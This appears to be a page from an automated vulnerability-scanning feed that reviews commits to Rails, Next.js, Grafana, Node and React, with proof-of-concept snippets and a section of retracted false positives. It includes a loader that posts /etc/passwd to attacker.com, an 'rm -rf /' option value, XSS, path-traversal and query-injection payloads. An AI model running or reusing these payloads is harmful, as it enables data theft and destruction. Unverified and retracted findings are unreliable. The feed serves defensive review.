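assert deduped.virtual is False  # fixed: the two columns no longer collide
```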

⚠️ MEDIUM UNVERIFIED Data Integrity Violation

Feb 14, 2026, 08:50 AM — rails/rails

Commit: 97cda8c

Author: Jean Boussier

The vulnerability allows silent data corruption where regular columns can be incorrectly deduplicated with virtual columns, causing INSERT and UPDATE statements to exclude legitimate columns and store NULL values instead of the intended data. This occurs when the deduplication registry encounters a virtual column first, then treats a regular column with the same name and type as identical.

🔍 View Affected Code & PoC

Affected Code

def ==(other)
  other.is_a?(Column) &&
    super &&
    auto_increment? == other.auto_increment?
end

Proof of Concept

1. Create a table with a virtual column named 'status'
2. Access the virtual column to register it in deduplication cache
3. Create another table with a regular column named 'status' 
4. Attempt to insert data: User.create!(status: 'active')
5. The status field will be NULL in database instead of 'active' because the regular column was deduplicated to the virtual column and excluded from the INSERT statement

💣 CRITICAL UNVERIFIED Code Injection

Feb 13, 2026, 06:45 PM — vercel/next.js

Commit: 740d55c

Author: Tobias Koppers

The feature allows arbitrary webpack loader execution through import attributes without proper validation or sandboxing. An attacker can specify malicious loader code that gets executed during the build process, potentially leading to remote code execution on the build server.

🔍 View Affected Code & PoC

Affected Code

import value from '../data.js' with { turbopackLoader: 'malicious-loader', turbopackLoaderOptions: '{"cmd":"rm -rf /"}' }

Proof of Concept

Create a malicious loader at node_modules/malicious-loader/index.js:
module.exports = function(source) {
  const { exec } = require('child_process');
  exec('curl -X POST -d "$(cat /etc/passwd)" http://attacker.com/exfil');
  return source;
}
Then use: `import data from './file.txt' with { turbopackLoader: 'malicious-loader' }` to execute arbitrary commands during build time.

🔥 HIGH UNVERIFIED Authorization Bypass

Feb 13, 2026, 06:25 PM — grafana/grafana

Commit: 74d146a

Author: Mihai Turdean

The MT IAM API server was using a no-op storage backend for RoleBindings, which silently dropped all write operations and returned empty results for reads. Additionally, the authorizer denied all access to rolebindings. This created an authorization bypass where RBAC role bindings were completely non-functional, potentially allowing unauthorized access or preventing proper access controls from being enforced.

🔍 View Affected Code & PoC

Affected Code

roleBindingsStorage: noopstorage.ProvideStorageBackend(), // TODO: add a proper storage backend
...
return authorizer.DecisionDeny, "access denied", nil

Proof of Concept

POST /apis/iam.grafana.app/v0alpha1/rolebindings with body: {"apiVersion":"iam.grafana.app/v0alpha1","kind":"RoleBinding","metadata":{"name":"admin-binding"},"subjects":[{"kind":"User","name":"attacker"}],"roleRef":{"kind":"Role","name":"admin"}} - This request would be silently dropped by noopstorage, never creating the intended role binding, while appearing to succeed to the caller.

⚠️ MEDIUM UNVERIFIED Use-After-Free / Socket Corruption

Feb 6, 2026, 04:29 PM — nodejs/node

Commit: 37ff1ea

Author: Martin Slota

A race condition in HTTP keep-alive socket reuse allowed responseKeepAlive() to be called twice, corrupting socket state and causing the agent to hand an already-assigned socket to multiple requests. This could cause requests to hang, timeout, or potentially leak data between requests sharing the same corrupted socket.

🔍 View Affected Code & PoC

Affected Code

if (req.shouldKeepAlive && req._ended)
  responseKeepAlive(req);

Proof of Concept

const http = require('http');
const agent = new http.Agent({ keepAlive: true, maxSockets: 1 });

// Send multiple POST requests with Expect: 100-continue header
// The server responds quickly while client delays req.end() slightly
// This triggers the race where responseOnEnd() and requestOnFinish() 
// both call responseKeepAlive(), corrupting the socket and causing
// subsequent requests to hang or timeout due to stripped listeners

for (let i = 0; i < 10; i++) {
  const req = http.request({
    method: 'POST',
    agent,
    headers: { 'Expect': '100-continue' }
  });
  setTimeout(() => req.end(), 0); // Delay to hit race window
}

💡 LOW UNVERIFIED Race Condition (TOCTOU)

Feb 13, 2026, 04:30 PM — nodejs/node

Commit: b92c9b5

Author: giulioAZ

A Time-of-Check Time-of-Use race condition in worker thread process.cwd() caching allowed workers to cache stale directory values. The counter was incremented before the directory change completed, creating a race window where workers could read the old directory but cache it with the new counter value.

🔍 View Affected Code & PoC

Affected Code

process.chdir = function(path) {
  AtomicsAdd(cwdCounter, 0, 1);
  originalChdir(path);
};

Proof of Concept

const { Worker } = require('worker_threads');
const worker = new Worker(`
  setInterval(() => {
    const cwd = process.cwd();
    console.log('Worker sees:', cwd);
  }, 1);
`, { eval: true });

// Rapidly change directories
setInterval(() => {
  process.chdir('..');
  process.chdir('./some-dir');
}, 10);

// Workers will intermittently report incorrect directory paths due to caching stale values with updated counter

🔥 HIGH CONFIRMED Privilege Escalation

Feb 11, 2026, 12:01 PM — grafana/grafana

Commit: e97fa5f

Author: Mariell Hoversholm

The vulnerability allows attackers to bypass time range restrictions on public dashboards when time selection is disabled. By manipulating request time parameters, attackers can access annotations outside the intended dashboard time range, potentially exposing sensitive data from unauthorized time periods.

🔍 View Affected Code & PoC

Affected Code

annoQuery := &annotations.ItemQuery{
	From:         reqDTO.From,
	To:           reqDTO.To,
	OrgID:        dash.OrgID,
	DashboardID:  dash.ID,

Proof of Concept

POST /api/public/dashboards/{uid}/annotations with body: {"from": 0, "to": 9999999999999} - This would bypass dashboard time restrictions and retrieve all annotations across the entire time range, even when time selection is disabled and should be restricted to the dashboard's configured time window.
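A hedged sketch of the server-side fix in spirit (function name and behavior are illustrative, not Grafana's exact patch): when time selection is disabled, ignore the client-supplied range and serve only the dashboard's configured window; even when enabled, never widen beyond it.

```python
# Clamp client-supplied from/to to the dashboard's configured time window.
def effective_range(req_from, req_to, dash_from, dash_to, time_selection_enabled):
    if not time_selection_enabled:
        # Locked dashboard: client values are ignored entirely.
        return dash_from, dash_to
    # Selection enabled: still never widen beyond the configured window.
    return max(req_from, dash_from), min(req_to, dash_to)

# Attacker sends the 'all of history' range against a locked dashboard:
assert effective_range(0, 9_999_999_999_999, 1_700_000_000, 1_700_086_400, False) \
    == (1_700_000_000, 1_700_086_400)
```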

⚠️ MEDIUM CONFIRMED XSS

Feb 11, 2026, 12:01 PM — grafana/grafana

Commit: 8dfa644

Author: Mariell Hoversholm

The code was vulnerable to Cross-Site Scripting (XSS) by directly rendering user-controlled data via dangerouslySetInnerHTML without sanitization. Malicious trace data could inject JavaScript that would execute in users' browsers. The patch fixes this by sanitizing HTML content with DOMPurify before rendering.

🔍 View Affected Code & PoC

Affected Code

const jsonTable = <div className={styles.jsonTable} dangerouslySetInnerHTML={markup} />;

where markup could contain:
__html: `<span style="white-space: pre-wrap;">${row.value}</span>`

Proof of Concept

A malicious trace with a KeyValuePair containing: {"key": "malicious", "value": "</span><script>alert('XSS');</script><span>", "type": "text"} would result in script execution when viewing the trace details in Grafana's TraceView component.

⚠️ MEDIUM CONFIRMED Header Injection

Feb 11, 2026, 12:36 AM — grafana/grafana

Commit: f073f64

Author: Jocelyn Collado-Kuri

The code forwards arbitrary HTTP headers from incoming requests to outgoing gRPC calls without proper validation or sanitization. An attacker can inject malicious headers that could be used to bypass security controls, manipulate downstream services, or perform request smuggling attacks.

🔍 View Affected Code & PoC

Affected Code

for key, value := range req.Headers {
    ctx = metadata.AppendToOutgoingContext(ctx, key, url.PathEscape(value))
}

Proof of Concept

Send a streaming request with malicious headers like 'Authorization: Bearer stolen-token' or 'X-Forwarded-For: 127.0.0.1' in the Headers map of backend.RunStreamRequest. These headers would be forwarded to the Tempo backend, potentially allowing privilege escalation or IP spoofing attacks against the downstream service.

⚠️ MEDIUM UNVERIFIED Prototype Pollution

Feb 5, 2026, 07:26 PM — vercel/next.js

Commit: 6aeef8e

Author: nextjs-bot

The code was directly accessing the `$$typeof` property on potentially untrusted objects without proper validation, allowing attackers to exploit prototype pollution to inject malicious `$$typeof` properties. The patch introduces a `readReactElementTypeof` function that uses `hasOwnProperty.call()` to safely check for the property's existence on the object itself rather than the prototype chain.

🔍 View Affected Code & PoC

Affected Code

if (value.$$typeof === REACT_ELEMENT_TYPE) {
  var typeName = getComponentNameFromType(value.type) || "\u2026",
    key = value.key;
  value = value.props;

Proof of Concept

Object.prototype.$$typeof = Symbol.for('react.element'); const maliciousObj = { type: 'script', props: { dangerouslySetInnerHTML: { __html: 'alert(1)' } } }; // This would bypass React element validation due to the polluted prototype

⚠️ MEDIUM UNVERIFIED Integer Division by Zero / Panic-based DoS

Feb 6, 2026, 08:03 PM — vercel/next.js

Commit: 6dfcffe

Author: Niklas Mischkulnig

The code performed integer division without checking for division by zero, which could cause a panic and crash the application. The patch replaces direct division with checked_div() to handle zero divisors safely.

🔍 View Affected Code & PoC

Affected Code

if max_chunk_count_per_group != 0 {
    chunks_to_merge_size / max_chunk_count_per_group
} else {
    unreachable!();
}

Proof of Concept

Set max_chunk_count_per_group to 0 through configuration or input parameters. When make_production_chunks() is called with this configuration, the zero divisor falls into the unreachable!() branch shown above (and any unguarded division would divide by zero), panicking and crashing the Turbopack bundler in a denial of service.

⚠️ MEDIUM UNVERIFIED Integer Overflow / Denial of Service

Feb 9, 2026, 10:38 PM — vercel/next.js

Commit: 9a2113c

Author: Luke Sandberg

The code incorrectly used max() instead of min() to clamp worker counts, causing all systems to be treated as having 64+ cores and potentially overflowing usize on systems with many actual cores. This could lead to memory exhaustion or application crashes.

🔍 View Affected Code & PoC

Affected Code

let num_workers = num_workers.max(64);
(num_workers * num_workers * 16).next_power_of_two()

Proof of Concept

On a system with a large number of cores (e.g., 10000), the calculation becomes (10000 * 10000 * 16).next_power_of_two() = 1,600,000,000.next_power_of_two() = 2,147,483,648 (2^31), a roughly 2 GiB allocation request; with even more cores the multiplication itself overflows 32-bit usize and panics. Either way, the result is massive memory allocation attempts or an overflow panic, leading to DoS.
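The difference between the buggy floor and the intended cap can be demonstrated with a small sketch (function names are hypothetical; `hashCapacity` models the `(n * n * 16).next_power_of_two()` expression from the affected code):

```javascript
// Contrasting the buggy floor with the intended cap:
// Math.max(n, 64) sets a FLOOR of 64; Math.min(n, 64) sets a CEILING of 64.
function buggyWorkers(cores) { return Math.max(cores, 64); } // wrong: floors at 64
function fixedWorkers(cores) { return Math.min(cores, 64); } // right: caps at 64

// Models (num_workers * num_workers * 16).next_power_of_two().
function hashCapacity(numWorkers) {
  const n = numWorkers * numWorkers * 16;
  return 2 ** Math.ceil(Math.log2(n)); // next power of two
}

console.log(hashCapacity(fixedWorkers(10000))); // 65536
console.log(hashCapacity(buggyWorkers(10000))); // 2147483648 (2^31)
```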

⚠️ MEDIUM CONFIRMED Path Traversal

Feb 4, 2026, 03:12 AM — facebook/react

Commit: 3ce1316

Author: Joseph Savona

The code had improper path resolution that allowed attackers to access files outside the intended directory structure. The patch fixes relative path resolution by properly normalizing paths relative to PROJECT_ROOT instead of allowing arbitrary relative paths from the current working directory.

🔍 View Affected Code & PoC

Affected Code

const inputPath = path.isAbsolute(opts.path)
  ? opts.path
  : path.resolve(process.cwd(), opts.path);

Proof of Concept

yarn snap compile ../../../etc/passwd

⚠️ MEDIUM UNVERIFIED Denial of Service (Stack Overflow)

Feb 4, 2026, 06:43 PM — facebook/react

Commit: cf993fb

Author: Hendrik Liebau

The recursive traversal of async node chains in visitAsyncNode causes stack overflow when processing deep async sequences. Database libraries creating long linear chains of async operations can trigger this DoS condition. The patch converts recursive traversal to iterative to prevent stack exhaustion.

🔍 View Affected Code & PoC

Affected Code

function visitAsyncNode(...) {
  if (visited.has(node)) {
    return visited.get(node);
  }
  visited.set(node, null);
  const result = visitAsyncNodeImpl(request, task, node, visited, cutOff);

Proof of Concept

// Create a deep chain of async sequences (10000+ levels)
let current = null;
for (let i = 0; i < 10000; i++) {
  current = { previous: current, end: -1 };
}
// This deep chain will cause stack overflow in visitAsyncNode
// when React Flight processes the async node traversal
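The recursive-to-iterative conversion can be illustrated with a generic chain walker (names are hypothetical; this is not the actual `visitAsyncNode` implementation):

```javascript
// Generic sketch of the fix: walk a `previous`-linked chain with an
// explicit loop instead of consuming one call-stack frame per node.
function countChainRecursive(node) {
  // Overflows the stack on chains deeper than the engine's frame limit.
  return node === null ? 0 : 1 + countChainRecursive(node.previous);
}

function countChainIterative(node) {
  let depth = 0;
  for (let n = node; n !== null; n = n.previous) depth++;
  return depth;
}

// Build a deep chain like the PoC above.
let current = null;
for (let i = 0; i < 200000; i++) current = { previous: current, end: -1 };

console.log(countChainIterative(current)); // 200000
// countChainRecursive(current) throws RangeError: Maximum call stack size exceeded
```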

⚠️ MEDIUM UNVERIFIED Denial of Service

Feb 8, 2026, 07:14 PM — facebook/react

Commit: 2dd9b7c

Author: Jimmy Lai

The code incorrectly checked for debugChannel existence instead of debugChannelReadable, causing the server to signal debug info availability even with write-only channels. This could cause clients to block indefinitely waiting for debug data that never arrives, resulting in a denial of service condition.

🔍 View Affected Code & PoC

Affected Code

debugChannel !== undefined,

Proof of Concept

// Server-side: Pass a write-only debug channel (no readable side)
const { Writable } = require('stream');
const writeOnlyChannel = new Writable({ write() {} });
renderToPipeableStream(component, { debugChannel: writeOnlyChannel });
// Client will now block forever waiting for debug data that cannot be read
❌ Corrections & Retractions (7)

⚠️ MEDIUM FALSE POSITIVE Path Traversal

Commit: 193f6f1

Author: Costa Alexoglou

The script used relative paths without proper directory resolution, allowing an attacker to execute the script from a different working directory and cause certificates to be written to unintended locations. This could lead to certificate files being created in arbitrary directories or overwriting existing files.

🔍 View Affected Code & PoC

Affected Code

rm -rf data/grafana-aggregator
mkdir -p data/grafana-aggregator
openssl req -nodes -new -x509 -keyout data/grafana-aggregator/ca.key

Proof of Concept

cd /tmp && /path/to/grafana/hack/make-aggregator-pki.sh

This would create certificates in /tmp/data/grafana-aggregator/ instead of the intended repo location, potentially overwriting files or bypassing access controls in the /tmp directory.

🔥 HIGH FALSE POSITIVE Authorization Bypass

Commit: aac8061

Author: Tania

The code was performing namespace validation for all provider types, but the static provider (which serves local configuration) should not enforce namespace restrictions. This created an authorization bypass where users could access feature flags from other organizations by using the static provider endpoint with mismatched namespaces.

🔍 View Affected Code & PoC

Affected Code

valid, ns := b.validateNamespace(r)
if !valid {
	http.Error(w, namespaceMismatchMsg, http.StatusUnauthorized)
	return
}

Proof of Concept

An attacker authenticated to org-1 could access feature flags intended for org-2 by making requests to the static provider endpoints (when providerType is not FeaturesServiceProviderType or OFREPProviderType) with org-2's namespace in the URL path, bypassing the namespace validation that should prevent cross-organization access.

⚠️ MEDIUM FALSE POSITIVE State Modification via Dry-Run Bypass

Commit: ccaf868

Author: Igor Suleymanov

The dual-writer storage system was not properly handling dry-run operations, allowing state modifications and side effects (like permission changes) to occur when they should only validate without making changes. This violates the dry-run contract where operations must be read-only.

🔍 View Affected Code & PoC

Affected Code

// Before patch - no dry-run check in Create method
func (d *dualWriter) Create(ctx context.Context, in runtime.Object, createValidation rest.ValidateObjectFunc, options *metav1.CreateOptions) (runtime.Object, error) {
    // ... proceeds to modify both legacy and unified storage even during dry-run

Proof of Concept

POST /api/v1/folders
Content-Type: application/json
Dry-Run: All

{"metadata":{"name":"test-folder"},"spec":{"title":"Test Folder"}}

# Before patch: This would create actual folder and modify permissions despite dry-run flag
# After patch: This only validates without side effects

🔥 HIGH FALSE POSITIVE Authorization Bypass

Commit: eda64c6

Author: Costa Alexoglou

The code incorrectly assigned key functions for namespaced and cluster-scoped resources, causing namespaced resources to use cluster-scoped key functions and vice versa. This could allow unauthorized access to resources across namespace boundaries by manipulating resource keys.

🔍 View Affected Code & PoC

Affected Code

if isNamespaced {
    statusStore.Store.KeyFunc = grafanaregistry.NamespaceKeyFunc(gr)
    statusStore.Store.KeyRootFunc = grafanaregistry.KeyRootFunc(gr)
} else {
    statusStore.Store.KeyFunc = grafanaregistry.ClusterScopedKeyFunc(gr)

Proof of Concept

curl -X PATCH 'http://localhost:3000/apis/advisor.grafana.app/v0alpha1/namespaces/admin-namespace/checks/sensitive-check/status' -H 'Content-Type: application/json-patch+json' -u 'low-priv-user:password' -d '[{"op": "replace", "path": "/status", "value": {"compromised": true}}]'

This would allow a low-privileged user to modify the status of resources in other namespaces due to the incorrect key function assignment.

⚠️ MEDIUM FALSE POSITIVE Query Injection

Commit: 9be63b1

Author: Steve Simpson

The code added validation for alert label matchers to prevent query injection in LogQL queries. Before the patch, malicious label names or matcher types could be injected into the LogQL query string without proper validation, potentially allowing attackers to manipulate the query structure.

🔍 View Affected Code & PoC

Affected Code

logql += fmt.Sprintf(` | alert_labels_%s %s %q`, matcher.Label, matcher.Type, matcher.Value)

Proof of Concept

POST request with Labels: [{"Type": "| json | drop", "Label": "severity", "Value": "critical"}] or Labels: [{"Type": "=", "Label": "test\" = \"injected\"", "Value": "value"}] to inject arbitrary LogQL operators and manipulate the query structure

⚠️ MEDIUM FALSE POSITIVE Information Disclosure

Commit: 14ee584

Author: Tom Ratcliffe

The code previously only allowed admin users to see team folder owners, but the patch changes this to allow any user with 'teams:read' permission to see folder owners. This creates an information disclosure vulnerability where users with lower privileges can access team ownership information they shouldn't be able to see.

🔍 View Affected Code & PoC

Affected Code

const isAdmin = contextSrv.hasRole('Admin') || contextSrv.isGrafanaAdmin;
{isAdmin && config.featureToggles.teamFolders && folderDTO && 'ownerReferences' in folderDTO && (
  <FolderOwners ownerReferences={folderDTO.ownerReferences} />
)}

Proof of Concept

1. Create a user account without admin privileges but with 'teams:read' permission
2. Navigate to a team folder that has owner references
3. Before patch: Owner information is hidden
4. After patch: Owner information is now visible, disclosing team membership and folder ownership data that was previously restricted to admins only

⚠️ MEDIUM FALSE POSITIVE Race Condition / Optimistic Locking Bypass

Commit: 57b75b4

Author: Will Assis

The code had a race condition in optimistic locking implementation where concurrent operations could bypass resource version checks. The original implementation would rollback changes after transaction commit, creating a window where conflicting writes could succeed simultaneously. The patch fixes this by performing conflict detection during the transaction using proper WHERE clauses with resource version constraints.

🔍 View Affected Code & PoC

Affected Code

DELETE FROM resource
WHERE group = ? AND resource = ? AND namespace = ? AND name = ?;
-- Missing resource_version check in WHERE clause

Proof of Concept

1. Client A reads resource with RV=100
2. Client B reads same resource with RV=100
3. Client A updates resource (RV becomes 101)
4. Client B deletes resource using old RV=100
5. Both operations succeed due to missing RV constraint in DELETE/UPDATE queries, allowing Client B to delete a resource that was modified after they read it, violating optimistic concurrency control
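Independent of whether this particular finding holds, the optimistic-locking pattern the patch moves to can be sketched generically: the expected resource version becomes part of the delete predicate, so a stale client loses the race (an in-memory model, not Grafana's storage code):

```javascript
// In-memory model of optimistic locking: a delete only succeeds when
// the caller's resource version matches the stored one, mirroring a
// `WHERE ... AND resource_version = ?` clause.
const store = new Map(); // name -> { value, rv }

function put(name, value) {
  const rv = (store.get(name)?.rv ?? 0) + 1; // bump resource version
  store.set(name, { value, rv });
  return rv;
}

function deleteWithRV(name, expectedRV) {
  const entry = store.get(name);
  if (!entry || entry.rv !== expectedRV) return false; // conflict: stale RV
  store.delete(name);
  return true;
}

// Replay the race from the PoC:
put('res', 'v1');                          // rv = 1; both clients read this
const staleRV = store.get('res').rv;
put('res', 'v2');                          // client A updates, rv = 2
console.log(deleteWithRV('res', staleRV)); // false: client B's stale delete is rejected
```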